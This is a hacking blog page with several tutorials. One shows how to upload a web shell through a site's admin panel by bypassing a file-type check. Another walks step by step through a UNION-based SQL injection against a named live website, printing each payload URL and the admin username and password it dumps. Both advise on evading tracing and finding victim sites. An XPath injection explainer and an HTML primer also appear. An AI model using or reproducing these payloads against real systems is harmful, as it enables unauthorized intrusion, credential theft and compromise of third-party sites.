Subscribe For Free Updates!

We'll not spam mate! We promise.

Saturday, 10 January 2015

[Tutorial] Uploading Shell From Admin Panel

Sahaj  , , ,  No comments

A complete tutorial on Uploading Shell From Admin Panel on Security Bots.

Things you need -

1. Access to admin panel of website.
2. A shell(You can download it from google).
3. Mozilla Firefox browser.
4. Live http headers(You can download it from google)


!! FOR EDUCATIONAL PURPOSES ONLY !!

So lets start with our tutorial -

1. First login to the admin panel to the website and then try to find a place where we can upload a file like image,pdf,doc etc. In my case I found gallery in my victim website where I can upload images.
2. Now we will gonna upload a shell, but we have to change the extension of the our shell to 'shell.php.jpg' because we are uploading our shell as an image.
3. Before uploading the 'shell.php.jpg' open Live Http Headers and minimize it and then click on upload button. Like I did in following image.


4. Now we have uploaded 'shell.php.jpg' , after that maximize the Live Http Headers and find 'shell.php.jpg' in HTTP headers box like I did in image given below.


5. Now click on that line in which in 'shell.jpg.php' is written and then click replay.
6. After clicking on Replay, a new window will open , now in second box find 'shell.php.jpg' and rename it to 'shell.php' and then again press replay. Like I did in image given below.


7. Now we have successfully uploaded our shell.Now right click on our second image and then click on Copy image location to get our shell link. Like I did in image given below.



Read More

XPath Injection Tutorial

Sahaj  , ,  No comments

What Is XPath Injection 


Description

XPath is a query language used to select data from XML data sources. It is increasingly common for web applications to use XML data files on the back-end, using XPath to perform queries much the same way SQL would be used against a relational database. 

XPath injection, much like SQL injection, exists when a malicious user can insert arbitrary XPath code into form fields and URL query parameters in order to inject this code directly into the XPath query evaluation engine. Doing so would allow a malicious user to bypass authentication (if an XML-based authentication system is used) or to access restricted data from the XML data source. 

XPath is a language that has been designed and developed primarily to address parts of an XML document. In XPath injection testing, we test if it is possible to inject data into an application so that it executes user-controlled XPath queries. When successfully exploited, this vulnerability may allow an attacker to bypass authentication mechanisms or access information without proper authorization.

Short Description of the Issue

Web applications heavily use databases to store and access the data they need for their operations. Historically, relational databases have been by far the most common technology for data storage, but, in the last years, we are witnessing an increasing popularity for databases that organize data using the XML language. Just like relational databases are accessed via SQL language, XML databases use XPath as their standard query language. Since, from a conceptual point of view, XPath is very similar to SQL in its purpose and applications, an interesting result is that XPath injection attacks follow the same logic as SQL Injection attacks. In some aspects, XPath is even more powerful than standard SQL, as its whole power is already present in its specifications, whereas a large number of the techniques that can be used in a SQL Injection attack depend on the characteristics of the SQL dialect used by the target database. This means that XPath injection attacks can be much more adaptable and ubiquitous. Another advantage of an XPath injection attack is that, unlike SQL, no ACLs are enforced, as our query can access every part of the XML document.

Black Box testing and example

The XPath attack pattern was first published by Amit Klein and is very similar to the usual SQL Injection. In order to get a first grasp of the problem, let's imagine a login page that manages the authentication to an application in which the user must enter his/her username and password. Let's assume that our database is represented by the following XML file:

<?xml version="1.0" encoding="ISO-8859-1"?> <users> <user> <username>gandalf</username> <password>!c3</password> <account>admin</account> </user> <user> <username>Stefan0</username> <password>w1s3c</password> <account>guest</account> </user> <user> <username>tony</username> <password>Un6R34kb!e</password> <account>guest</account> </user> </users> 
An XPath query that returns the account whose username is "gandalf" and the password is "!c3" would be the following: 

string(//user[username/text()='gandalf' and password/text()='!c3']/account/text()) 


If the application does not properly filter user input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values: 

Username: ' or '1' = '1 Password: ' or '1' = '1 

Looks quite familiar, doesn't it? Using these parameters, the query becomes: 

string(//user[username/text()='' or '1' = '1' and password/text()='' or '1' = '1']/account/text()) 

As in a common SQL Injection attack, we have created a query that always evaluates to true, which means that the application will authenticate the user even if a username or a password have not been provided. 

And as in a common SQL Injection attack, with XPath injection, the first step is to insert a single quote (') in the field to be tested, introducing a syntax error in the query, and to check whether the application returns an error message. If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack, whose goal is to reconstruct the whole data structure. The technique is similar to inference based SQL Injection, as the approach is to inject code that creates a query that returns one bit of information. 

Read More

An Introduction to HTML

Sahaj  ,  No comments

Welcome to Security Bots. Here's is a tutorial/ introduction on HTML.

HTML is a markup language for describing web documents (web pages).
  • HTML stands for Hyper Text Markup Language
  • A markup language is a set of markup tags
  • HTML documents are described by HTML tags
  • Each HTML tag describes different document content

HTML Example

Small HTML document

<!DOCTYPE html>
<html>
<body>

<h1>My First Heading</h1>

<p>My first paragraph.</p>

</body>
</html>

Try it Yourself »

Example Explained

  • The DOCTYPE declaration defines the document type
  • The text between <html> and </html> describes the web document
  • The text between <body> and </body> describes the visible page content
  • The text between <h1> and </h1> describes a heading
  • The text between <p> and </p> describes paragraph
Using the description, a web browser can display a document with a heading and a paragraph.

HTML Tags

HTML tags are keywords (tag names) surrounded by angle brackets:
<tagname>content</tagname>
  • HTML tags normally come in pairs like <p> and </p>
  • The first tag in a pair is the start tag, the second tag is the end tag
  • The end tag is written like the start tag, but with a slash before the tag name.

Read More

Step-By-Step SQL Injection Tutorial

Sahaj  , ,  No comments




Here's a definition for SQL injection. According to Wikipedia ,
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

Before we start:



There are a few things I recommend you use, and install when performing SQLi Attacks. They are either vital, or extremely helpful when executing your injection.
  • VPN (Virtual Private Network)
  • Firefox with the "Hackbar" addon
  • Patience


Beginning with the most important, I will explain what each item is for. VPN is, in short an application we will use to visually change our IP from your external, to another. This gives you more protection when hacking, as it means any IP left by you is harder to trace (But not impossible). I recommend using proXPN, just go to their website, make a free account, and you're good to go.


Secondly, Firefox. Firefox is not what i'm loving though. It's the addon, Hackbar. Just install the two, and you'll see what I mean. It will come in handy later.


And finally, patience. There are quite a few steps in this, and it doesn't always work. Just keep working at it, and you'll get it.


Finding our site - Vulnerabilities:



In order to perform the injection, we need to find a vulnerable site. Although it can be done with luck using Google, you can type in a special code to get vulnerable sites easier. The way you find these sites, is by typing any of the  codes into Google. Here are those dorks/codes.


Go ahead and tap one into Google, and you'll get a multitude of sites. For my example, I will be using This site.


To test if a site has vulnerabilities, put an apostrophe after the URL, just after the numbers:




If an error is thrown, the site is vulnerable. Here's an example:


Quote:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1


You've got a site, let's move on!


Working out the number of Columns:



Columns? In what? MySQL is a type of database management system, and the amount of columns are the amount held within the sites' databases. They can range from 1-???, and can me named anything the administrator wants. We need to find the number out, as we need to find out which columns are vulnerable to the injection. To do this, we use the 'order by' command.


So, we take our URL without the apostrophe on the end. At the end, type in 'order by 1--'. The two dashes are vital for the command to work. So it would be like so:




Now, continue to increment (increase) the number until an error comes up. This is where Hackbar comes in handy, as you can just highlight the number in the URL and press the '+' button until the error is thrown.




An error came up at 12, which means column 12 doesn't exist. That means, you guessed it, there are 11 columns on this database (Note, it varies for every website you do, yours may not necessarily be 11). Make a note of the number of columns. And as a helpful hand, this is what the error may look like:

Finding out the vulnerable column:



So, we now there are 11 columns on this database. What we now need to do, is work out which column is vulnerable to the injection. Once again, we use a command, but slightly different. Firstly, at the end of our URL there are numbers (173). We need to add a '-' before this number, but after the equals. 




Note: I am not sure, but I believe you can, instead of inserting '-', replace all the numbers with 'null'. If somebody could confirm this for me, that'd be great!


Now, we will use a command called 'union all select'. This works by listing all of the column numbers separated by a comma (1-11), like so:


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select 1,2,3,4,5,6,7,8,9,10,11--



The webpage should then throw some numbers. This one gives me 1,2,7 and 11. They will be apparent to you, for example in bold writing, but they are scattered around the place. My page looks like this:



You can take any of these numbers, but I recommend taking the first one you see for simplicities sake. Now, to put is basically, the number is the number of the column we will be executing commands in from now on.


Checking the version number:



Although this is not always a rule (But it is for the most part), for the SQLi to work the MySQL Database version has to be above Version 5. To check what version we're running on, it's very simple. Refer to the number you chose from the previous step. Take that number, and follow these steps to the bone. I have chosen number 1, in case you were wondering.


In the URL, you have the numbers. The number you have chosen should be in that set of numbers. Now, what you have to do, is take the number you chose and replace it with '@@version'. So, I chose the number '1' as it was the first that the 'union all select' command showed, so I replace it with the version command.


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select @@version,2,3,4,5,6,7,8,9,10,11--


After executing, a version number should appear where it previously had your number. Like this:





My database version is '5.1.54-0.dotdeb.0'.


And yes! The SQL version for this site is above 5. The first number is all you need to worry about, as long as it's above 5 you're good to go. Next up, we've got to find the name of the actual database.


Finding the main database's name:



The main database is where all the other columns, and tables branch off from. We need it later in the tutorial, so listen closely.


Firstly, take your URL, and where it says '@@version', replace it with 'concat(database())'.


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select concat(database()),2,3,4,5,6,7,8,9,10,11--



A new page should load! Now, some text should have appeared on the page, where the database version previously was. This will be (usually) different for every site you perform an SQLi on, as it is changed by the site admin. Mine looks like so, and is called 'Future_future2'.




And that's it, we have the name of the database. Make a note of it in Notepad! We will need it again!


Displaying the database's tables:



Now we have the database name, we are good to move onto the next part: Displaying the tables. The tables are what's inside the database, and contain all the data. To view them, we use a few commands. First, we add 'group' to 'concat(database())', and change 'database()' to 'table_name', like so:


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(table_name),2,3,4,5,6,7,8,9,10,11--


We then need to add information, which will be black magic. All you need to know is, it needs to be there. It goes after the number sequence, and should say 'from information_schema.tables where table_schema=database()--'. Like so:


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(table_name),2,3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--



At this point, all of the tables will appear.


Now, you'll want to make a note of all of those table names, for later reference. It's very important you do so. A recommendation, put it in the same text file as the database name, just two (or so) paragraphs under.


Entering the tables - Viewing their content:



Now, we have the database name, all of the main table names, and now we need to find the information from the correct table. The one we're looking for is the one with worthwhile information. Usually, it will be called something like 'users, usernames, info, userinfo', etc. On this site, mine is 'users'.


So, what you want to do is find that table. Now, we're going to have to type in a command to view it. But firstly, we need a hexadecimal (HEX) converter. There are many, but here are my two favourites, but I recommend we use the top one:
  • xLate (However, the HEX has spaces in. The spaces need to be removed between each number)

The command is as follows. You change 'group_concat(table_name)' to 'group_concat(column_name)', and 'information_ schema.tables' to 'information_schema.columns'. We also change 'table_schema' to 'table_name'. On top of this, after the equals, we add in 0x and then the HEX Number, which I am about to get onto.


We need to use TextToHex to convert the name of the table, with worthwhile information in (Mine was users), to a HEX value. To do this, just type in the name of the table, and boom, done. We then add that value after the 0x. Confusing? Look below:


users = 7573657273 in HEX


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(column_name),2,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name=0x7573657273--



Once again, this will give us more names of tables. However, these ones should be in a much smaller quantity. I was given four, and the two i'm interested in is 'username' and 'password'. Your table names may not always be the same, it varies between each site. Sometimes, you may not have the correct table and useless tables are given to you. You have to be persistent, and patient, and keep trying.




Entering the table content - Viewing their data:



Now, we've got lots of data picked up so far. But, there's only 4 bits which we need to use now.
  • Database Name - Future_future2
  • Main Table - users
  • Two Table Contents - username, password


Now, we want to find out what is inside username, and password. What you need to do, is this:


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(contentName),2,3,4,5,6,7,8,9,10,11 from databaseName.mainTable--


So, firstly you need to fill in the red with your own data. So, mine would change to:


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(username),2,3,4,5,6,7,8,9,10,11 from Future_future2.users--


By executing this, you would be given the data inside 'username'.


Quote:http://www.futuresfins.com/fin-detail.php?id=-173 union all select group_concat(password),2,3,4,5,6,7,8,9,10,11 from Future_future2.users--


And then the data inside 'password'. I now have the Admin Login, and am nearly done. Hopefully, so are you!


Username: admin
Password: foilcore


Sometimes, the password/username is crypted, usually with a type of Hash Cyptography. You then need to find a Hash Decrypter, I recommend MD5Decrypter.com, and decrypt!


Finding the Administrator's Login Page:



This is either going to be the easiest, or hardest bit of the tutorial so far. The Login page is usually the home page, with an extra bit added to the end. The most common include:
  • /admin
  • /admin.php
  • /login
  • /login.php


The list goes on for millions, just use trial and error.


Unfortunately, my site has a protection on the admin login. I cannot bypass this (I don't think), so cannot access the Admin Panel.


If you are having difficulty finding the page, there are a multitude of Python scripts, and more which can be used to find the page. I recommend using them, as they're sometimes faster, and easier.

Read More
Subscribe to: Comments (Atom)

 

Copyright © 2013 Security Bots.